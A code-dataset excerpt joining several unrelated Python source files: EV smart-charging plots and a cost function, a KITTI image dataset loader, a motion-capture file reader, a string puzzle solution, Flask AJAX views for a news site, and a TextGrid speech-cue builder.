fig.add_trace(go.Scatter(\n x=df.index,\n y=df['use_lin'],\n mode='lines',\n name='Use (interpolated)',\n line=dict(\n color='red',\n width=2,\n dash='dot'\n )\n ))\n\n # fig.add_trace(go.Scatter(\n # x=df.index,\n # y=df['use_rolling'],\n # mode='lines',\n # name='Use ('+str(7)+' day rolling mean) [kWh]',\n # line=dict(\n # color='red',\n # width=2,\n # dash='dot'\n # )\n # ))\n\n # fig.add_trace(go.Scatter(\n # x=df.index,\n # y=df['use_ewm'],\n # mode='lines',\n # name='Use (Exponentially Weighted Moving Average with half life = '+str(2)+') [kWh]',\n # line=dict(\n # color='red',\n # width=2,\n # dash='dash'\n # )\n # ))\n\n # fig.add_trace(go.Scatter(\n # x=df.index,\n # y=df['use_dailyaverage'],\n # mode='lines',\n # name='Use daily average (outside of plug-in) [kWh]',\n # line=dict(\n # color='red',\n # width=0.5,\n # dash='dash'\n # )\n 
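# Aside: the use-estimators above are plain pandas window operations. Note the source's own
# distinction: 'use_org_rolling' is the trailing mean it marks as usable "without cheating",
# since it never reads future SOC values. A minimal sketch on synthetic data:
import numpy as np
import pandas as pd

use = pd.Series(np.abs(np.random.default_rng(1).normal(size=30 * 24)))  # 30 days, hourly
trailing = use.rolling(10 * 24, min_periods=12).mean()   # causal 10-day window
smoothed = use.ewm(span=10 * 24, min_periods=24).mean()  # recent hours weigh more
assert trailing.iloc[-1] > 0 and smoothed.iloc[-1] > 0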
# ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['price'],\n mode='lines',\n name='Price',\n line=dict(\n color='purple',\n width=1\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['SOC'],\n mode='lines',\n name = \"SOC\",\n line=dict(\n color='lightblue',\n width=2\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['trueprice'],\n mode='lines',\n name='Price',\n line=dict(\n color='purple',\n width=1\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['SOCmax'],\n mode='lines',\n name = \"SOC max [kWh]\",\n line=dict(width=2, color='grey') #color='DarkSlateGrey')\n # Add index value to hovertext\n # hovertext = df.index\n ))\n\n if plot_efficiency_and_SOCmin:\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['efficiency']*100,\n mode='lines',\n name = \"Efficiency [%]\",\n line=dict(width=2, color='DarkSlateGrey')\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['efficiency_median']*100,\n mode='lines',\n name = \"Efficiency median [%]\",\n line=dict(width=2, color='DarkSlateGrey', dash='dot')\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['SOC_lin'],\n mode='lines',\n name = \"SOC (linear interpolation)\",\n line=dict(\n color='lightblue',\n width=2,\n dash='dot'\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['SOCmin_everymorning'],\n mode='lines',\n name = \"Minimum SOC\",\n line=dict(\n color='lightblue',\n width=2 , dash='dash'\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['BatteryCapacity'],\n mode='lines',\n name = \"Battery Capacity [kWh]\",\n line=dict(\n color='darkgrey',\n dash='dash'\n )))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['use_org_rolling'],\n mode='lines',\n name = \"Rolling Use (10 days)\",\n line=dict(\n color='red',\n width=1,\n dash='dash'\n )\n ))\n\n if vertical_hover:\n # Add vertical hover lines\n fig.update_layout(\n hovermode='x unified',\n hoverdistance=100, # Distance to show hover label of data point\n spikedistance=1000, # Distance to show spike\n hoverlabel=dict(\n bgcolor=\"white\",\n font_size=16,\n font_family=\"Rockwell\"\n )\n )\n \n # Set xticks to be individual days\n fig.update_xaxes(\n tickmode = 'array',\n tickvals = [firsttime + datetime.timedelta(days=i) for i in range((lasttime-firsttime).days+1)],\n ticktext = [str(firsttime + datetime.timedelta(days=i))[:10] for i in range((lasttime-firsttime).days+1)],\n tickangle = 45\n )\n # Add legend\n fig.update_layout(\n title_text=\"Charging by \" +str(var) + \"=\"+ str(id) + \" from \"+str(firsttime)+\" to \"+str(lasttime), # title of plot\n xaxis_title_text=\"Date\", # xaxis label\n yaxis_title_text=\"kWh or True-False [1, -1]\", # yaxis label\n #font=dict(\n # size=18,\n # color=\"RebeccaPurple\"\n #)\n )\n\n if layout is not None:\n # Export html\n fig.write_html(pathhtml + imgtitle + str(id) + \".html\")\n fig.update_layout(layout)\n # For the x-ticks, only show every 7th day\n fig.update_xaxes(\n tickmode = 'array',\n tickvals = [firsttime + datetime.timedelta(days=i) for i in range((lasttime-firsttime).days+1) if i%7==0],\n ticktext = [str(firsttime + datetime.timedelta(days=i))[:10] for i in range((lasttime-firsttime).days+1) if i%7==0],\n tickangle = 45\n )\n # Remove x-ticks and xaxis title text (TEMPORARY)\n # fig.update_xaxes(\n # showticklabels=False,\n # title_text=\"\"\n # )\n\n # Subset data to 2022-09-20 to 2022-09-30\n # fig.update_xaxes(\n # range=['2022-09-20', '2022-09-30']\n # )\n # fig.update_yaxes(\n # range=[-1, 10]\n # )\n\n # Decrease linewidth of all lines\n for i in 
range(len(fig.data)):\n fig.data[i].line.width = 1.5\n # Export pdf\n fig.write_image(path + imgtitle + str(id) + \".pdf\")\n \n if not df_only:\n fig.show()\n return df\n\ndef MontasSmartCharge(dfv, u, z, L, b0, r, c_tilde):\n # define c as the minimum between price and trueprice ignoring nan to allow benefit of the DK1/DK2 doubt in favor of Montas algorithm\n c = dfv[['price', 'trueprice']].min(axis=1, skipna=True)\n x = dfv['charge']\n u = u\n z = z\n # b_t+1 = b0 + r*x - u\n b = np.zeros(len(dfv)+1)\n b[0] = b0\n for i in range(len(dfv)):\n b[i+1] = b[i] + r*x[i] - u[i]\n total_cost = np.sum(x * c) - c_tilde * (b[-1] - b0)\n prob = {'x':x[:L], 'b':b[:(L+1)], 'u':u[:L], 'c':c[:L], 'z':z[:L], 'objective':total_cost}\n return(prob, x, b)","repo_name":"davidripsen/code_Smart_Charging","sub_path":"MPC/FunctionCollection.py","file_name":"FunctionCollection.py","file_ext":"py","file_size_in_byte":42318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"5028507604","text":"from __future__ import absolute_import\nfrom __future__ import division\nimport torch as t\nfrom skimage import transform as sktsf\nfrom torchvision import transforms as tvtsf\nfrom data import util\nimport numpy as np\nfrom utils.config import opt\nfrom math import pi\nfrom data.kitti_img_dataset import ImageKITTIDataset\n\ndef inverse_normalize(img):\n # approximate un-normalize for visualize\n return (img * 0.225 + 0.45).clip(min=0, max=1) * 255\n\n\ndef pytorch_normalze(img):\n \"\"\"\n https://github.com/pytorch/vision/issues/223\n return appr -1~1 RGB\n \"\"\"\n normalize = tvtsf.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n img = normalize(t.from_numpy(img))\n return img.numpy()\n\ndef preprocess(img, min_size=375, max_size=1242):\n \"\"\"Preprocess an image for feature extraction.\n The length of the shorter edge is scaled to :obj:`self.min_size`.\n After the scaling, if the length of the longer edge is longer than\n :param min_size:\n :obj:`self.max_size`, the image is scaled to fit the longer edge\n to :obj:`self.max_size`.\n After resizing the image, the image is subtracted by a mean image value\n :obj:`self.mean`.\n Args:\n img (~numpy.ndarray): An image. 
This is in CHW and RGB format.\n The range of its value is :math:`[0, 255]`.\n Returns:\n ~numpy.ndarray: A preprocessed image.\n \"\"\"\n C, H, W = img.shape\n scale1 = min_size / min(H, W)\n scale2 = max_size / max(H, W)\n scale = min(scale1, scale2)\n img = img / 255.\n img = sktsf.resize(img, (C, H * scale, W * scale), mode='reflect',anti_aliasing=False)\n # both the longer and shorter should be less than\n # max_size and min_size\n normalize = pytorch_normalze\n return normalize(img)\n\n\nclass Transform(object):\n\n def __init__(self, min_size=375, max_size=1242):\n self.min_size = min_size\n self.max_size = max_size\n\n def __call__(self, in_data):\n img, bbox, label, depth, y_rot = in_data\n _, H, W = img.shape\n img = preprocess(img, self.min_size, self.max_size)\n _, o_H, o_W = img.shape\n scale = o_H / H\n bbox = util.resize_bbox(bbox, (H, W), (o_H, o_W))\n\n # horizontally flip\n img, params = util.random_flip(\n img, x_random=True, return_param=True)\n bbox = util.flip_bbox(\n bbox, (o_H, o_W), x_flip=params['x_flip'])\n if params['x_flip']:\n for i in range(len(y_rot)):\n theta = float(y_rot[i])\n if theta > 0:\n y_rot[i] = pi - theta\n if theta < 0:\n y_rot[i] = -pi - theta\n y_rot[i]\n if theta == 0:\n y_rot[i] = 3.14\n\n return img, bbox, label, depth, y_rot, scale\n\n\n\n'''\n The bounding boxes are packed into a two dimensional tensor of shape\n :math:`(R, 4)`, where :math:`R` is the number of bounding boxes in\n the image. The second axis represents attributes of the bounding box.\n They are :math:`(y_{min}, x_{min}, y_{max}, x_{max})`, where the\n four attributes are coordinates of the top left and the bottom right\n vertices.\n \n The labels are packed into a one dimensional tensor of shape :math:`(R,)`.\n :math:`R` is the number of bounding boxes in the image.\n The class name of the label :math:`l` is :math:`l` th element of\n :obj:`VOC_BBOX_LABEL_NAMES`.\n\n The array :obj:`difficult` is a one dimensional boolean array of shape\n :math:`(R,)`. :math:`R` is the number of bounding boxes in the image.\n If :obj:`use_difficult` is :obj:`False`, this array is\n a boolean array with all :obj:`False`.\n \n The type of the image, the bounding boxes and the labels are as follows.\n * :obj:`img.dtype == numpy.float32`\n * :obj:`bbox.dtype == numpy.float32`\n * :obj:`label.dtype == numpy.int32`\n * :obj:`difficult.dtype == numpy.bool`\n\n'''\n\n\nclass Dataset:\n def __init__(self, opt):\n self.opt = opt\n self.db = ImageKITTIDataset(opt.train_data_dir)\n self.tsf = Transform(opt.min_size, opt.max_size)\n\n def __getitem__(self, idx):\n ori_img, bbox, label, difficult, depth, y_rot = self.db.get_example(idx)\n '''\n If :obj:`return_difficult == True`, this dataset returns corresponding\n :obj:`img, bbox, label, difficult`. 
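# Aside: the three y_rot branches in Transform.__call__ above are one rule -- a horizontal
# flip mirrors the yaw as theta -> pi - theta, wrapped back into (-pi, pi] (the hard-coded
# 3.14 is a crude pi for theta == 0). A compact check of that rule:
from math import pi

def flip_yaw(theta):
    mirrored = pi - theta        # reflect heading across the vertical image axis
    if mirrored > pi:            # wrap back into (-pi, pi]
        mirrored -= 2 * pi
    return mirrored

assert abs(flip_yaw(0.3) - (pi - 0.3)) < 1e-9    # theta > 0 branch
assert abs(flip_yaw(-0.3) - (-pi + 0.3)) < 1e-9  # matches the -pi - theta branch
assert abs(flip_yaw(0.0) - pi) < 1e-9            # the theta == 0 special case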
:obj:`difficult` is a boolean array\n that indicates whether bounding boxes are labeled as difficult or not.\n '''\n img, bbox, label, depth, y_rot, scale = self.tsf((ori_img, bbox, label, depth, y_rot))\n # TODO: check whose stride is negative to fix this instead copy all\n # some of the strides of a given numpy array are negative.\n return img.copy(), bbox.copy(), label.copy(), depth.copy(), y_rot.copy(), scale\n\n def __len__(self):\n return len(self.db)\n \n\nclass TestDataset:\n def __init__(self, opt):\n self.opt = opt\n self.db = ImageKITTIDataset(opt.test_data_dir)\n\n def __getitem__(self, idx):\n ori_img, bbox, label, difficult, depth, y_rot = self.db.get_example(idx)\n img = preprocess(ori_img)\n return img, ori_img.shape[1:], bbox, label, difficult\n\n def __len__(self):\n return len(self.db)\n","repo_name":"YupengHan/FusionNet","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41587154231","text":"\"\"\"Methods for opening cortex files\n\n\"\"\"\n\nimport logging\nfrom pathlib import Path\nfrom pprint import pprint\nimport re\n\nimport pandas as pd\n\nLOG = logging.getLogger(__name__)\n\n\ndef open(path: Path):\n \"\"\"Open a cortex motion capture file\n\n Restructures columns to use a single index\n\n Returns:\n A pandas dataframe index by timedelta with columns\n\n .. code-block:: python\n\n Frame#,\n FHEAD.X, FHEAD.Y, FHEAD.Z,\n RHEAD.X, RHEAD.Y, RHEAD.Z,\n THEAD.X, THEAD.Y, THEAD.Z,\n LHEAD.X, LHEAD.Y, LHEAD.Z,\n C7.X, C7.Y, C7.Z,\n BBAC.X, BBAC.Y, BBAC.Z, \n Offset_Nav.X, Offset_Nav.Y,Offset_Nav.Z,\n XYPH.X, XYPH.Y, XYPH.Z,\n STRN.X, STRN.Y, STRN.Z,\n LSHO.X, LSHO.Y, LSHO.Z,\n RSHO.X, RSHO.Y, RSHO.Z,\n LASIS.X, LASIS.Y, LASIS.Z,\n LPSIS.X, LPSIS.Y, LPSIS.Z,\n RASIS.X, RASIS.Y, RASIS.Z,\n RPSIS.X, RPSIS.Y, RPSIS.Z,\n SACRUM.X, SACRUM.Y, SACRUM.Z,\n RLM.X, RLM.Y, RLM.Z,\n RHEE.X, RHEE.Y, RHEE.Z,\n RTOE.X, RTOE.Y, RTOE.Z,\n RMT5.X, RMT5.Y, RMT5.Z,\n LHEE.X, LHEE.Y, LHEE.Z,\n LTOE.X, LTOE.Y, LTOE.Z,\n LMT5.X, LMT5.Y, LMT5.Z,\n V_RShoulder.X, V_RShoulder.Y, V_RShoulder.Z,\n V_LShoulder.X, V_LShoulder.Y, V_LShoulder.Z,\n V_Neck.X, V_Neck.Y, V_Neck.Z,\n V_LShoulder_Dyn.X, V_LShoulder_Dyn.Y, V_LShoulder_Dyn.Z,\n V_RShoulder_Dyn.X, V_RShoulder_Dyn.Y, V_RShoulder_Dyn.Z,\n V_Mid_ASIS_Dyn.X, V_Mid_ASIS_Dyn.Y, V_Mid_ASIS_Dyn.Z,\n V_Head.X, V_Head.Y, V_Head.Z,\n V_Mid_PSIS.X, V_Mid_PSIS.Y, V_Mid_PSIS.Z,\n V_RFoot.X, V_RFoot.Y, V_RFoot.Z,\n V_LFoot.X, V_LFoot.Y, V_LFoot.Z,\n V_RAnkle_Dyn.X, V_RAnkle_Dyn.Y, V_RAnkle_Dyn.Z,\n V_Neck2.X, V_Neck2.Y, V_Neck2.Z,\n V_Pelvis.X, V_Pelvis.Y, V_Pelvis.Z,\n V_Sacrum.X, V_Sacrum.Y, V_Sacrum.Z\n\n Note: \n may recieve warnings due to extra data existing to the right of the recorded data, safe to ignore\n\n \"\"\"\n LOG.info(\"reading cortex trc file: %s\", str(path))\n\n # first read only the column names\n try:\n cols = pd.read_csv(\n path, sep=\"\\t\", header=[3, 4], nrows=0, error_bad_lines=False\n )\n except (pd.errors.ParserError):\n cols = pd.read_csv(\n path,\n sep=\"\\t\",\n header=[3, 4],\n nrows=0,\n engine=\"python\",\n error_bad_lines=False,\n )\n\n # LOG.debug(\"%s\", cols.to_string())\n\n # edit column names to make column names into single level index similar to dflow data\n # I am droping the number value associated with each marker (We need only X, Y, Z)\n new_cols = []\n a_col_name = \"\"\n for col in cols:\n if \"Unnamed\" in col[0]:\n if \"Unnamed\" not in col[1]:\n 
new_cols.append(a_col_name + \".\" + col[1][0])\n else:\n pass\n else:\n if \"Unnamed\" in col[1]:\n new_cols.append((col[0]))\n else:\n new_cols.append((col[0] + \".\" + col[1][0]))\n a_col_name = col[0]\n\n # LOG.debug(\"\\n%s\\ntotal=%d\", '\\n'.join(f\"\\t{s}\" for s in new_cols), len(new_cols))\n\n # read the data but use my edited column names\n try:\n _df = pd.read_csv(\n path,\n sep=\"\\t\",\n names=new_cols,\n usecols=new_cols,\n header=None,\n skiprows=[0, 1, 2, 3, 4, 5],\n index_col=False,\n skip_blank_lines=False,\n error_bad_lines=False,\n )\n except (pd.errors.ParserError):\n _df = pd.read_csv(\n path,\n sep=\"\\t\",\n names=new_cols,\n usecols=new_cols,\n header=None,\n skiprows=[0, 1, 2, 3, 4, 5],\n index_col=False,\n skip_blank_lines=False,\n error_bad_lines=False,\n engine=\"python\",\n )\n\n # convert to a timedelta index\n _df[\"Time\"] = pd.to_timedelta(_df[\"Time\"], unit=\"s\")\n _df.set_index(\"Time\", inplace=True)\n\n if LOG.isEnabledFor(logging.DEBUG):\n LOG.debug(\n \"file as read into memory:\\n%s\", _df.to_string(max_rows=20, line_width=200)\n )\n # LOG.debug(\"last modified: %s\", time.ctime(os.path.getctime(path)))\n\n # LOG.debug('pandas DataFrame.info(): \\n%s', _df.info(verbose=True))\n\n return _df\n\n\ndef probe_elapsed_time(path: Path):\n \"\"\"get elapsed time from cortex file\n\n Args:\n path: pathobject to cortex file\n \n Returns:\n elapsed time as a timedelta\n\n \"\"\"\n LOG.info(\"probing duration for: %s\", str(path))\n\n try:\n df = pd.read_csv(\n path,\n sep=\"\\t\",\n header=None,\n names=[\"Frame#\", \"Time\"],\n usecols=[\"Frame#\", \"Time\"],\n skiprows=[0, 1, 2, 3, 4, 5],\n skip_blank_lines=False,\n error_bad_lines=False,\n )\n except (pd.errors.ParserError):\n df = pd.read_csv(\n path,\n sep=\"\\t\",\n header=None,\n names=[\"Frame#\", \"Time\"],\n usecols=[\"Frame#\", \"Time\"],\n engine=\"python\",\n skiprows=[0, 1, 2, 3, 4, 5],\n skip_blank_lines=False,\n error_bad_lines=False,\n )\n\n if df[\"Time\"].size > 1:\n return pd.Timedelta(df[\"Time\"].iloc[-1] - df[\"Time\"].iloc[0], unit=\"s\")\n else:\n LOG.error(\"unable to parse elapsed time\")\n return pd.NaT\n\n\ndef get_task_name(path: Path):\n \"\"\"return task according to file name\"\"\"\n\n # return none if regex fails\n task_name = None\n\n match = re.search(r\".*?_([a-z]+)\\.?(\\d{1,2}).*?\", path.name.lower())\n if match:\n task_name = \"_\".join(match.groups())\n\n return task_name\n\n\ndef multiindex(df):\n \"\"\" \n transform cortex mocap data to use multi-indexed columns\n\n Returns:\n\n \"\"\"\n\n # grab columns\n mocap = df.loc[:, df.columns.str.contains(r\"\\.[x,y,z]{1}\", case=False)]\n\n # multi-index\n mocap.columns = pd.MultiIndex.from_tuples(\n c.lower().split(\".\") for c in mocap.columns\n )\n\n return mocap\n","repo_name":"MVDLab/VMIntegration","sub_path":"hmpldat/file/cortex.py","file_name":"cortex.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18356933058","text":"############################# PROBLEM OF THE DAY - 22nd March 2023 #################################################\n#-------------------------------------------------------------------------------------------------------------------\n\n\n# Given a string S. In one operation, you can remove the substring \"pr\" from the string S and get amount X or \n# you can remove the substring \"rp\" and get the amount Y. 
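The full task, stated just below, asks for the maximum total amount; a brute-force cross-check on a made-up case (an illustrative sketch, not part of the original solution file):

    def best(S, X, Y):
        # try every removable 'pr'/'rp' pair and recurse; fine for tiny strings
        best_val = 0
        for i in range(len(S) - 1):
            if S[i:i + 2] == 'pr':
                best_val = max(best_val, X + best(S[:i] + S[i + 2:], X, Y))
            if S[i:i + 2] == 'rp':
                best_val = max(best_val, Y + best(S[:i] + S[i + 2:], X, Y))
        return best_val

    print(best('rpprp', 5, 4))  # 9: one 'pr' removal (5) plus one 'rp' removal (4)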
\n# Find the maximum amount you can get if you perform zero or more such operations optimally. \n\n\nclass Solution:\n def solve(self, X, Y, S):\n # code here\n x, y = 0, 0\n while True:\n if X >= Y:\n if 'pr' in S:\n x += S.count('pr')\n S = S.replace('pr', '')\n elif 'rp' in S:\n y += S.count('rp')\n S = S.replace('rp', '')\n else:\n break\n \n if Y > X:\n if 'rp' in S:\n y += S.count('rp')\n S = S.replace('rp', '')\n elif 'pr' in S:\n x += S.count('pr')\n S = S.replace('pr', '')\n else:\n break\n \n return (X*x)+(y*Y)","repo_name":"Arman-ali-khan-786/competitve_programming","sub_path":"gfg/potd/String_rp_or_pr.py","file_name":"String_rp_or_pr.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"18824298974","text":"from flask import render_template, redirect, request, url_for, session, jsonify\nfrom flask_login import login_user, login_required, logout_user, current_user\nfrom . import ajax\nfrom model.model import *\n\n\n@ajax.route('/thumb', methods=['POST', 'GET'])\n@login_required\ndef thumb():\n is_del = request.args.get('del', 0, type=int)\n operand = request.args.get('oper', 0, type=int)\n operand_id = request.args.get('id', 0, type=int)\n oper = OPERAND[operand](id=operand_id).select(getone=True)\n is_thumb = oper.is_thumb(current_user.id)\n if is_del and is_thumb:\n oper.del_thumb(current_user.id)\n elif not is_thumb:\n oper.set_thumb(current_user.id)\n return jsonify(True)\n\n\n@ajax.route('/collect', methods=['POST', 'GET'])\n@login_required\ndef collect():\n is_del = request.args.get('del', 0, type=int)\n operand = request.args.get('oper', 0, type=int)\n operand_id = request.args.get('id', 0, type=int)\n oper = OPERAND[operand](id=operand_id).select(getone=True)\n is_collect = oper.is_collect(current_user.id)\n if is_del and is_collect:\n oper.del_collect(current_user.id)\n elif not is_collect:\n oper.set_collect(current_user.id)\n return jsonify(True)\n\n\n@ajax.route('/follow', methods=['POST', 'GET'])\n@login_required\ndef follow():\n user_id = request.args.get('id', -1, type=int)\n print(user_id, current_user.id)\n if user_id == -1:\n return jsonify({'f': 0})\n user = Account(id=user_id).select(getone=True)\n if current_user.is_follow(user):\n current_user.unfollow(user)\n result = -1\n else:\n current_user.follow(user)\n result = 1\n return jsonify({'f': result})\n\n\n@ajax.route('/visitor', methods=['POST', 'GET'])\n@login_required\ndef get_visitor():\n if current_user and current_user.email == \"voterlin@foxmail.com\":\n visitor = Visitor().select(oderby=\"member_since\", isasc=False)\n return jsonify(visitor)\n return \"None Info\"\n\n\n@ajax.route('/account', methods=['POST', 'GET'])\n@login_required\ndef get_account():\n if current_user.email == \"voterlin@foxmail.com\":\n account = Account().select(oderby=\"timestamp\", isasc=False)\n return jsonify(account)\n return \"None Info\"\n\n\n@ajax.route('/table', methods=['GET'])\ndef get_table():\n # 0 one_day / 1 top_word / 2 one_word\n type = request.args.get('type', 0, type=int)\n if type == 0:\n time = now(1)\n fre = Frequency(time=time).select(oderby='times', isasc=False, limit=20)\n return jsonify(day_search_result(fre))\n elif type == 1:\n web = Website().select(oderby='time', isasc=False, limit=20)\n return jsonify(top_word_result(web))\n elif type == 3:\n web = Website().select(oderby='time', isasc=False, limit=20)\n return jsonify(one_day_news_result(web))\n elif type == 2:\n word = request.args.get('word', '', type=str)\n fre = 
Frequency(word=word).select(oderby='time', isasc=True, limit=20)\n return jsonify(word_search_result(fre))\n\n\ndef one_day_news_result(web):\n data = []\n labels = []\n for w in web:\n data.append(w.news_count)\n labels.append(str(w.time))\n return {'data': data, 'labels': labels}\n\n\ndef top_word_result(web):\n data = []\n labels = []\n for w in web:\n data.append(w.top_word_count)\n labels.append(w.top_word)\n return {'data': data, 'labels': labels}\n\n\ndef day_search_result(fre):\n data = []\n labels = []\n for f in fre:\n data.append(f.times)\n labels.append(f.word)\n return {'data': data, 'labels': labels}\n\n\ndef word_search_result(fre):\n data = []\n labels = []\n for f in fre:\n data.append(f.times)\n labels.append(str(f.time))\n return {'data': data, 'labels': labels}\n","repo_name":"VintLin/Hot-News","sub_path":"App/ajax/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"68"} +{"seq_id":"7137962565","text":"import pandas as pd\nimport numpy as np\nimport textgrid\nimport os\nimport re, sys\n\npattern = \"([A-Za-z0-1@]+[A-Za-z0-1@]+)\"\n\ndef read_sentences(rootpath):\n file_list = os.listdir(rootpath)\n return file_list\n\nclass Sentences:\n\n def __init__(self):\n self.word_list = []\n\n def read_from_textgrid(self, file_textgrid_obj):\n '''\n Assume: a set of textgrid files in a path, each of which has a 'words' tier and a 'segments' tier.\n The segments tier includes all segments of every word in SAMPA.\n Read all textgrid files one by one. Read every segment corresponding to a certain word and output\n information about this word into a csv, including: starting/ending time, word, segments of\n the word, starting/ending time of this segment.\n :param file_list: all files in the path\n :return: nothing\n '''\n global intervals_words, intervals_segments\n\n tier_list = file_textgrid_obj.tiers\n interval_num = 0\n\n for each_tier in tier_list:\n if each_tier.name == 'words':\n tier_words = each_tier\n intervals_words = tier_words.intervals\n elif each_tier.name == 'segments':\n tier_segments = each_tier\n intervals_segments = tier_segments.intervals\n #get segments & words intervals in list\n try:\n for each_word in intervals_words:\n word_start_time = each_word.minTime\n word_end_time = each_word.maxTime\n word_mark = each_word.mark\n segment_list = []\n\n a_word = Word(word_start_time, word_end_time, word_mark, segment_list)\n try:\n while (intervals_segments[interval_num].minTime >= word_start_time) \\\n & (intervals_segments[interval_num].maxTime <= word_end_time) \\\n & (intervals_segments[interval_num].minTime != intervals_segments[interval_num].maxTime):\n\n segment_mark = intervals_segments[interval_num].mark\n m = re.match(pattern, segment_mark)\n if m:\n tmp_list = list(segment_mark)\n for each_seg in tmp_list:\n segment_list.append(each_seg)\n #print(each_seg)\n else:\n segment_list.append(segment_mark)\n interval_num += 1\n except IndexError:\n interval_num = 0\n a_word.update_segment_list(segment_list)\n self.word_list.append(a_word)\n except AttributeError:\n print('tier words is empty or does not exist ')\n\nclass Word:\n def __init__(self, word_start_time, word_end_time, word_mark, segment_list):\n self.word_mark = word_mark\n self.word_start_time = word_start_time\n self.word_end_time = word_end_time\n self.segment_list = segment_list\n self.event_list = []\n self.num_in_event_list = 0\n self.cues_list = []\n\n def update_segment_list(self, 
new_segment_list):\n self.segment_list = new_segment_list\n\n def update_event_list (self, new_event_list):\n self.event_list = new_event_list\n\n def update_num_in_event_list(self, new_num_in_event_list):\n self.num_in_event_list = new_num_in_event_list\n\n def update_cues_list (self, new_cues_list):\n self.cues_list = new_cues_list\n\ndef create_event(a_sentence, filename):\n\n word_obj_list = a_sentence.word_list\n length = len(word_obj_list)\n event_list = []\n each_event_list = []\n\n for each_word in word_obj_list:\n #print(str(each_word.segment_list)+\" \"+each_word.word_mark)\n if each_word.word_mark != '\n\n        ':\n each_event_list.append(each_word)\n else:\n if each_event_list != []:\n event_list.append(each_event_list)\n each_event_list = []\n else:\n each_event_list = []\n if each_event_list != []:\n event_list.append(each_event_list)\n\n #print(event_list)\n count_event = 0\n count_word = 0\n num_in_event_list = 0\n\n\n for each_word in word_obj_list:\n if each_word.word_mark != '\n\n        ':\n each_word.update_event_list(event_list[count_event])\n each_word.update_num_in_event_list(num_in_event_list)\n num_in_event_list += 1\n count_word += 1\n else:\n if count_word != 0 :\n #print(filename+str(count_word)+\" \"+str(len(word_obj_list)-1))\n\n if ((count_word+1) <= (len(word_obj_list)-1)):\n if (word_obj_list[count_word+1].word_mark != '\n\n        '):\n count_event += 1\n count_word += 1\n num_in_event_list = 0\n else:\n count_word += 1\n num_in_event_list = 0\n\n else:\n count_event += 1\n count_word += 1\n num_in_event_list = 0\n\n elif count_word == 0:\n count_word += 1\n num_in_event_list = 0\n\n #print(each_word.word_mark+\" \"+str(each_word.event_list) + \" \"+str(each_word.num_in_event_list))\n\n\ndef create_cues(a_sentence, existing_np, filename):\n word_obj_list = a_sentence.word_list\n df = existing_np\n for each_word in word_obj_list:\n cue_word_list = []\n cue_segment_list = []\n if each_word.word_mark != '\n\n        ':\n event_list = each_word.event_list\n length = len(event_list)\n num_in_event_list = each_word.num_in_event_list\n if 0 <= each_word.num_in_event_list -2:\n cue_word_list.append(event_list[num_in_event_list-2])\n\n if 0 <= each_word.num_in_event_list -1:\n cue_word_list.append(event_list[num_in_event_list-1])\n\n cue_word_list.append(each_word)\n\n if each_word.num_in_event_list+1 <= length-1:\n cue_word_list.append(event_list[num_in_event_list+1])\n\n if each_word.num_in_event_list+2 <= length-1:\n cue_word_list.append(event_list[num_in_event_list+2])\n\n if cue_word_list[0].num_in_event_list -1 >= 0:\n vor_word = event_list[cue_word_list[0].num_in_event_list -1]\n vor_segment = vor_word.segment_list[len(vor_word.segment_list)-1]\n cue_segment_list.append(vor_segment)\n else:\n cue_segment_list.append(\"#\")\n\n for each_cue_word in cue_word_list:\n for each_cue_segment in each_cue_word.segment_list:\n cue_segment_list.append(each_cue_segment)\n\n if cue_word_list[len(cue_word_list)-1].num_in_event_list +1 <= len(event_list) -1:\n nach_word = event_list[cue_word_list[len(cue_word_list)-1].num_in_event_list +1]\n #print(nach_word.segment_list)\n try:\n nach_segment = nach_word.segment_list[0]\n cue_segment_list.append(nach_segment)\n except IndexError:\n print(filename)\n else:\n cue_segment_list.append(\"#\")\n #print(cue_segment_list)\n\n whole_cue = []\n\n for each_cue_word in cue_word_list:\n whole_cue.append(each_cue_word.word_mark)\n whole_cue.append(\"_\")\n\n length = len(cue_segment_list)\n count = 0\n\n for each_cue_segment in cue_segment_list:\n if count == 0:\n whole_cue.append(each_cue_segment)\n whole_cue.append(cue_segment_list[count + 1])\n whole_cue.append(\"_\")\n count += 1\n\n elif count == length - 2:\n whole_cue.append(each_cue_segment)\n whole_cue.append(cue_segment_list[count + 1])\n count += 1\n\n elif count == length - 1:\n break\n\n else:\n whole_cue.append(each_cue_segment)\n whole_cue.append(cue_segment_list[count + 1])\n whole_cue.append(\"_\")\n count += 1\n\n df = write_into_df (a_sentence, each_word, whole_cue, df, filename)\n\n return df\n\n\n\n\ndef write_into_df (a_sentence, each_word, whole_cue, existing_np, filename):\n sentence = []\n event = []\n for each_word_obj in a_sentence.word_list:\n sentence.append(each_word_obj.word_mark)\n\n for each_word_obj in each_word.event_list:\n event.append(each_word_obj.word_mark)\n\n sentence_str = \" \".join(sentence)\n event_str = \" \".join(event)\n this_word_str = each_word.word_mark\n cue_str = \"\".join(whole_cue)\n\n new_np = np.array([[sentence_str,event_str,cue_str, this_word_str, filename]])\n results_np = np.vstack([existing_np,new_np])\n #existing_np.append([[sentence_str,event_str,cue_str, this_word_str]], axis = 0)\n #print(new_np)\n return results_np\n\n\n\n\nif __name__ == 